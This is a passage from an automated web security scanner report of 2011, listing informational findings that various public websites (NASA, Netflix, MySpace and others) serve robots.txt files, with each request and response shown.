Date: Sat, 02 Apr 2011 14:05:50 GMT
Connection: close

User-agent: *
Disallow: /bmi/
Disallow: /BVFrame.aspx
Disallow: /BVSandbox.aspx
Disallow: /cashback/admin
Disallow: /cashback/go
Disallow: /challenge
Disallow: /community/forums/tags
Disallow:
...[SNIP]...

24.559. http://www.musiciansfriend.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.musiciansfriend.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.musiciansfriend.com

Response

HTTP/1.0 200 OK
Server:
Last-Modified: Mon, 10 Aug 2009 18:13:58 GMT
X-Cnection: close
Content-Type: text/plain; charset=UTF-8
Vary: Host
Expires: Sat, 02 Apr 2011 13:40:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:40:08 GMT
Content-Length: 775
Connection: close
Set-Cookie: AKA-SESSION=35ce8f185c5000003827974d9aaa0400919f0000; path=/; domain=musiciansfriend.com
Set-Cookie: OMTR-AKAID=35ce8f185c5000003827974d9aaa0400929f0000; expires=Sun, 06-Mar-2016 13:40:08 GMT; path=/; domain=musiciansfriend.com
Set-Cookie: AKA-SESSION-5D=35ce8f185c5000003827974d9aaa0400939f0000; expires=Thu, 07-Apr-2011 13:40:08 GMT; path=/; domain=musiciansfriend.com

# Musicians Friend
# Modified 2009-08-10
User-agent: *
Disallow: /srs7/shop/
Disallow: /srs7/g=home/shop/
Disallow: /srs7/g=guitar/shop/
Disallow: /srs7/g=bass/shop/
Disallow: /srs7/g=key/shop/
...[SNIP]...

24.560. http://www.mybloglog.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mybloglog.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mybloglog.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:42:53 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Thu, 24 Feb 2011 05:17:31 GMT
Accept-Ranges: bytes
Content-Length: 70
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /buzz/lc_message/
Disallow: /buzz/lc_message2/

24.561. http://www.mycokerewards.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mycokerewards.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mycokerewards.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 10 Jan 2011 19:20:00 GMT
ETag: "4045dd-33b-daa6b800"
Accept-Ranges: bytes
Content-Length: 827
Content-Type: text/plain; charset=ISO-8859-1
Expires: Sat, 02 Apr 2011 13:35:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:35:40 GMT
Connection: close

User-agent: *
Disallow: /catalog.do?searchType=*&
Allow: /catalog.do?searchType=
Disallow: /catalog.do?searchType=*&
Allow: /earnPoints.do
Disallow: /earnPoints.do?
Allow: /itemDetail.do?itemId=
...[SNIP]...

24.562. http://www.mycricket.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mycricket.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mycricket.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:53 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 05:56:22 GMT
ETag: "255-49bfb5b8e6d80"
Accept-Ranges: bytes
Content-Length: 597
Connection: close
Content-Type: text/plain

User-agent: *

Allow: /community/events/list/index.php
Disallow: /community/events/list/*
Disallow: /community/calendar-date/*
Disallow: /community/taxonomy/*
Disallow: /community/ical-email-me/*

...[SNIP]...

24.563. http://www.myheritage.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myheritage.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myheritage.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.2.9 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.9
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:41:04 GMT
Content-Length: 13194
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache

User-agent: *
Disallow: /storage/
Disallow: /Resources/
Disallow: /populate/
Disallow: /Utility/
Disallow: /F/
Disallow: /G/
Disallow: /H/
Disallow: /I/
Disallow: /FP/Scripts/
Disallow: /FP/
...[SNIP]...

24.564. http://www.mylife.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylife.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mylife.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:46 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.30
Last-Modified: Thu, 29 Jul 2010 21:48:48 GMT
ETag: "258d60-23-48c8db2fc5000"
Accept-Ranges: bytes
Content-Length: 35
P3P: policyref="http://www.mylife.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OUR NOR"
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /upop.do

24.565. http://www.mylifetime.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylifetime.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mylifetime.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sat, 02 Apr 2011 06:43:07 GMT
X-Pingback: http://www.mylifetime.com/xmlrpc.php
RealServer: prodweb8
Cteonnt-Length: 1616
Content-Type: text/plain; charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 02 Apr 2011 13:35:22 GMT
Date: Sat, 02 Apr 2011 13:35:22 GMT
Content-Length: 1616
Connection: close

User-agent: *
# Directories
Disallow: /database/
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /sites/
Disallow: /themes/
Disallow: /scripts/
Disallow: /updates/
Disal
...[SNIP]...

24.566. http://www.mynewplace.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mynewplace.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mynewplace.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.7a
Cache-Control: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa DEVa TAIa CONo OUR IND DSP CAO COR"
ETag: "6QC0bRdrRav"
Last-Modified: Wed, 30 Mar 2011 18:45:32 GMT
Accept-Ranges: bytes
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: ab=sv=1.2:T85=T850; domain=mynewplace.com; path=/; expires=Mon, 02-May-2011 13:57:15 GMT
Set-Cookie: mnpbiscotto=sv=1.3:cs=A:u=346426441:vs=N; domain=mynewplace.com; path=/; expires=Fri, 01-Jul-2011 13:57:15 GMT
Set-Cookie: JSESSIONID=efhbapEGYkh6W8BhoGw8s; path=/
Content-Type: text/plain; charset=UTF-8
Content-Length: 944
Date: Sat, 02 Apr 2011 13:57:15 GMT
Connection: close
Set-Cookie: BIGipServerWEB_APPS_WWW=2382430730.37919.0000; path=/
Vary: Accept-Encoding, User-Agent

User-agent: *
Disallow: /signin/
Disallow: /register/
Disallow: /action/
Disallow: /action/signInAction
Disallow: /action/signOutAction
Disallow: /authenticated/
Disallow: /saveproperty/
Disallow: /sa
...[SNIP]...

24.567. http://www.mysanantonio.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mysanantonio.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mysanantonio.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:16 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Mar 2011 21:27:16 GMT
ETag: "c5-53519500"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Cache-Control: public
Age: 0
Expires: Sat, 02 Apr 2011 14:15:16 GMT
x-cdn: Cotendo
Connection: close

Sitemap: http://www.mysanantonio.com/sitemap.xml
Sitemap: http://www.mysanantonio.com/sitemap_news.xml
User-agent: *
Allow: /
Disallow: /?controllerName=search
Disallow: /?controllerName=emailThis

24.568. http://www.myspace.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myspace.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myspace.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
X-Server: faadf633c108eb7e53abcb7abbcf10a0d95fc14840170b44
Set-Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634373194476792130&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Sat, 09-Apr-2011 12:37:27 GMT; path=/
Set-Cookie: SessionDDF2=utUbQvCsEK0zQZjUgyM0uC0vpbwQeayiiwkdqa7incim7ZBWjI7CX011fsGAjo8YtZfw9zdOQQ/+h0SPnHevqA==; domain=.myspace.com; expires=Wed, 02-Apr-2031 12:37:27 GMT; path=/
X-AspNet-Version: 4.0.30319
X-PoweredBy: Chunk from Goonies
Date: Sat, 02 Apr 2011 12:37:27 GMT
Connection: keep-alive
Content-Length: 215
X-Vertical: profileidentities

User-agent: *
Disallow: /my/*
Disallow: /about/*
Disallow: /signup/*
Disallow: /webim/*
Disallow: /search/*
Disallow: /AdSandbox.ashx
Disallow: /help/reportabuse?*
Disallow: /signout
Disallow
...[SNIP]...

24.569. http://www.mystart.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mystart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mystart.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:19 GMT
Server: Microsoft-IIS/5.0
Last-Modified: Fri, 12 Feb 2010 16:05:32 GMT
ETag: "1066-2c-4b757c4c"
Accept-Ranges: bytes
Content-Length: 44
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

24.570. http://www.myxer.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myxer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myxer.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:18 GMT
Server: Microsoft-IIS/7.0
Cache-Control: private
Content-Length: 262
Content-Type: text/plain; charset=utf-8
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=8
Set-Cookie: ASP.NET_SessionId=xujhsd45sorjzr45ayyfkizv; path=/; HttpOnly
Set-Cookie: SERVERID=PW03; path=/
Vary: Accept-Encoding
Connection: close

#robots.txt

User-agent: *
Disallow: /wap/
Disallow: /ajax/
Disallow: /signin/

User-agent: Googlebot-Mobile
Disallow: /ajax/
Disallow: /flickr/
Disallow: /signin/

User-agent: MSNBot-Mobi
...[SNIP]...

24.571. http://www.myyearbook.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myyearbook.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myyearbook.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:54 GMT
Server: Apache
Last-Modified: Mon, 19 Oct 2009 16:21:11 GMT
ETag: "c25469-8b-4764c223f2bc0"
Accept-Ranges: bytes
Content-Length: 139
X-Server-Name: web37
Connection: close
Content-Type: text/plain
X-MyPoolMember: 10.100.10.93

User-agent: *
Disallow: /info_signup
Noarchive: /

User-agent: Googlebot
Noarchive: /
Disallow: /ajax

User-agent: ia_archiver
Disallow: /

24.572. http://www.nadaguides.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nadaguides.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nadaguides.com

Response

HTTP/1.1 200 OK
Content-Length: 6522
Content-Type: text/plain
Last-Modified: Tue, 15 Mar 2011 01:03:39 GMT
Accept-Ranges: bytes
ETag: "4348efd1ace2cb1:6ef2"
Server: Microsoft-IIS/6.0
p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
X-NADAGuides: NY#4
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:51:58 GMT
Connection: close

User-Agent: *
Sitemap: http://www.nadaguides.com/sitemap_index.xml
Allow: /Cars/*/Incentives-and-Rebates
Disallow: /b2b/
Disallow: /Cars/*/Incentives
Disallow: /Cars/*/Owner-Ratings
Disallow: /C
...[SNIP]...

24.573. http://www.nasa.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nasa.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nasa.gov

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 13 Jun 2005 19:33:58 GMT
ETag: "118e8ec-6a-3f97199dab580"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:39:06 GMT
Content-Length: 106
Connection: close

# Robots.txt file from http://www.nasa.gov
#
# All robots will spider the domain

User-agent: *
Disallow:

24.574. http://www.nationalgeographic.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalgeographic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nationalgeographic.com

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 28 Feb 2011 20:58:26 GMT
X-Cache-Lookup: HIT from rpc6.int.ngeo.com:80
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Content-Length: 2052
Xonnection: Xeep-Alive
Content-Type: text/plain
Cache-Control: max-age=2248
Expires: Sat, 02 Apr 2011 14:05:06 GMT
Date: Sat, 02 Apr 2011 13:27:38 GMT
Connection: close

##********************************
##GLOBAL - allowing crawler access to image filetypes per CC request
## - approved by editorial meeting 11/02/09
##********************************
User-agent: *
...[SNIP]...

24.575. http://www.navy.mil/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.navy.mil
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.navy.mil

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 11 Jun 2009 16:35:08 GMT
ETag: "0c6e694b2eac91:287"
Server: Microsoft-IIS/6.0
Header: US Navy
X-Powered-By: ASP.NET
Cache-Control: max-age=992
Date: Sat, 02 Apr 2011 13:56:00 GMT
Content-Length: 1556
Connection: close

User-agent: gsa-crawler+(Enterprise;+GEX-01325;+james.garrett.ctr@hq.afis.osd.mil)
Disallow: /images/
Disallow: /media/
Disallow: /management/
Disallow: /management/photodb
Disallow: /list_single
...[SNIP]...

24.576. http://www.nba.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nba.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nba.com

Response

HTTP/1.0 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Length: 205
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:25:13 GMT
Connection: close

User-Agent: *
Disallow: /mediacentral/*
Disallow: /suns/tickets/vervelounge_requests.html
Disallow: /search
Sitemap: http://www.nba.com/video_sitemap_index.xml
Sitemap: http://www.nba.com/sitemap_inde
...[SNIP]...

24.577. http://www.nbc.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nbc.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.10
Last-Modified: Thu, 22 Oct 2009 00:40:25 GMT
ETag: "270e408-37-4767b5753b040"
Accept-Ranges: bytes
Content-Length: 55
Wirt: qw-p-web16.qwplatform.com
Content-Type: text/plain
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 13:25:28 GMT
Date: Sat, 02 Apr 2011 13:24:28 GMT
Connection: close
Set-Cookie: ak-mobile-true=no; expires=Sun, 03-Apr-2011 13:24:28 GMT; path=/
Vary: User-Agent

# robots.txt for /
#
#
#
User-agent: *
Disallow:/admin

24.578. http://www.nbcnewyork.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbcnewyork.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nbcnewyork.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 04:30:58 GMT
X-Server-Name: dv-c1-r2-u14-b6
Content-Type: text/plain;charset=utf-8
Date: Sat, 02 Apr 2011 14:16:19 GMT
Content-Length: 172
Connection: close

User-agent: *
Disallow: /assets/
Disallow: /i/
Disallow: /live/
Disallow: /results/
Disallow: /syndication/
Allow: /
Sitemap: http://www.nbcnewyork.com/sitemap.xml

24.579. http://www.ncm.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ncm.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ncm.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 25 Mar 2011 13:00:38 GMT
Accept-Ranges: bytes
ETag: "09f1da3eceacb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:35:56 GMT
Connection: close
Content-Length: 369

User-Agent: *
Disallow: /CSS
Disallow: /Fathom
Disallow: /Info
Disallow: /Images
Disallow: /Movies/Ticketing_Bounce.aspx
Disallow: /Movies/Photo_Slideshow.aspx
Disallow: /Celebrities/Photo_Slid
...[SNIP]...

24.580. http://www.netflix.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netflix.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.netflix.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:47 GMT
Server: Apache-Coyote/1.1
Last-Modified: Thu, 24 Mar 2011 13:33:18 GMT
Content-Type: text/plain
Content-Length: 1449
Vary: Accept-Encoding
Cache-Control: private
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Set-Cookie: NSC_ED2-xxx=ffffffff09cc3e6845525d5f4f58455e445a4a422d69;path=/;domain=netflix.com;httponly

# /robots.txt file for www.netflix.com/
# Mod NDH 5/23/2003

User-agent: *
Disallow: /Address
Disallow: /AddToQueue
Disallow: /BeMyFriend
Disallow: /BillingHistory
Disallow: /BillingActivity
Disallow:
...[SNIP]...

24.581. http://www.netquote.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netquote.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.netquote.com

Response

HTTP/1.1 200 OK
Content-Length: 510
Content-Type: text/plain
Content-Location: http://www.netquote.com/flatcontent/netquote/robots.txt
Last-Modified: Tue, 23 Dec 2008 21:30:21 GMT
Accept-Ranges: bytes
ETag: "809472a84565c91:898"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:36:37 GMT
Connection: close

User-agent: *

Disallow: /newsletter/subscribe-confirmation.aspx
Disallow: /nq/progressive_motorcycle.aspx
Disallow: /Timeout.aspx
Disallow: /Errors/
Disallow: /health-insurance.aspx
Disallow:
...[SNIP]...

24.582. http://www.netsuite.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netsuite.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.netsuite.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 195
Content-Disposition: inline;filename*=utf-8''robots.txt
NS_RTIMER_COMPOSITE: 669476043:73686F702D6A6176613030332E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=1993
Date: Sat, 02 Apr 2011 13:39:19 GMT
Connection: close

User-Agent: *
Disallow: /portal/pdf/tos.pdf

Crawl-Delay: 10
User-Agent: *
Disallow: /portal/resource/terms_of_service.shtml

User-Agent: *
Disallow: /portal/resource/terms-of-service.shtml

24.583. http://www.newegg.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newegg.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newegg.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 18 Mar 2010 02:17:25 GMT
ETag: "1830812641c6ca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
x-server-id: 121
X-UA-Compatible: IE=7
Content-Length: 789
Date: Sat, 02 Apr 2011 13:40:39 GMT
Age: 0
Connection: keep-alive
X-Served-By: E401
X-Ver: 11030801
X-Cache: MISS
X-Cache-Hits: 0
Set-Cookie: NSC_xxx.ofxfhh.dpn-WJQ=ffffffffaf18326045525d5f4f58455e445a4a4229a1;expires=Sat, 02-Apr-2011 14:35:28 GMT;path=/

User-agent: *

Disallow: /App/
Disallow: /Application/
Disallow: /Common/
Disallow: /Configuration/
Disallow: /Scripts/
Disallow: /Test.aspx
Disallow: /GiftCertificate/GiftCartPlus.aspx
Disal
...[SNIP]...

24.584. http://www.newgrounds.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newgrounds.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newgrounds.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:24 GMT
Server: Apache/2.2.17 (Unix)
Last-Modified: Fri, 19 Nov 2010 20:37:38 GMT
ETag: "6b234f-148-4956de08aa880"
Accept-Ranges: bytes
Content-Length: 328
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /dump/
Disallow: /cgi-bin/
Disallow: /bbs/post.php
Disallow: /bbs/takepost.php
Disallow: /pm/
Disallow: /moderators/
Disallow: /bbs/moderators/
Disallow: /ajax/
Disallow: /js/

...[SNIP]...

24.585. http://www.newport-news.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newport-news.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newport-news.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Fri, 10 Dec 2010 16:33:12 GMT
ETag: "d46deeef8798cb1:1373"
Content-Length: 512
Date: Sat, 02 Apr 2011 13:56:03 GMT
Connection: close

User-agent: *
Disallow: /15off
Disallow: /aspnet_client
Disallow: /bin
Disallow: /club
Disallow: /clubgold
Disallow: /common
Disallow: /config
Disallow: /controls
Disallow: /controlsMobile
D
...[SNIP]...

24.586. http://www.newsbucket.co.uk/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsbucket.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newsbucket.co.uk

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:03 GMT
Server: Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2 PHP/5.2.4-2ubuntu5.14 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Mon, 01 Nov 2010 22:38:17 GMT
ETag: "14648167-1a-4940576e04840"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 13:58:03 GMT
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:


24.587. http://www.newser.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newser.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newser.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Expires: Sun, 29 Mar 2020 00:00:00 GMT
Last-Modified: Thu, 08 Jul 2010 22:17:24 GMT
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 14:03:49 GMT
Connection: close
Content-Length: 449

# Newser: robots.txt
#
# This file is used to allow crawlers to crawl our site.
#
User-agent: *
Disallow: /controlpage.aspx
Disallow: /getimage.aspx
Disallow: /getresizedimage.aspx
Disallo
...[SNIP]...

24.588. http://www.newsinc.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsinc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newsinc.com

Response

HTTP/1.1 200 OK
Content-Length: 122
Content-Type: text/plain
Last-Modified: Thu, 22 Jan 2009 06:38:16 GMT
Accept-Ranges: bytes
ETag: "7074ad15c7cc91:f72"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
S: 1.www.newsinc.com
Date: Sat, 02 Apr 2011 14:14:48 GMT
Connection: close

# robots.txt generated at http://www.mcanerin.com
User-agent: *
Disallow:
Disallow: /cgi-bin/
Disallow: /freewheel/

24.589. http://www.newsmax.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newsmax.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 07 Dec 2010 16:54:34 GMT
Accept-Ranges: bytes
ETag: "4799126d2f96cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 02 Apr 2011 13:31:44 GMT
Connection: close
Content-Length: 278

User-agent: *
Disallow: /*.axd
Disallow: /*.axd$
Disallow: /ScriptResource.axd$
Disallow: /ScriptResource.axd*
Disallow: /WebResource.axd$
Disallow: /WebResource.axd*
Disallow: /bin/
sitemap:
...[SNIP]...

24.590. http://www.newsok.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsok.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newsok.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 13 Aug 2010 18:59:02 GMT
ETag: "1bd078-150-48db91378e980"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Connection: close
Date: Sat, 02 Apr 2011 12:52:35 GMT
Age: 213
Content-Length: 336

User-Agent: *
Disallow: /xml
Disallow: /photo/
Disallow: /load/
Disallow: /news9/
Disallow: /movies/
Disallow: /my/
Disallow: /apps/
Disallow: /article/keyword/
Disallow: /cj/
Disallow: /cox/
Disallow
...[SNIP]...

24.591. http://www.newsvine.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=cb25ff935b866007940a37e6786f7dc4; expires=Fri, 28-Mar-2031 13:44:28 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
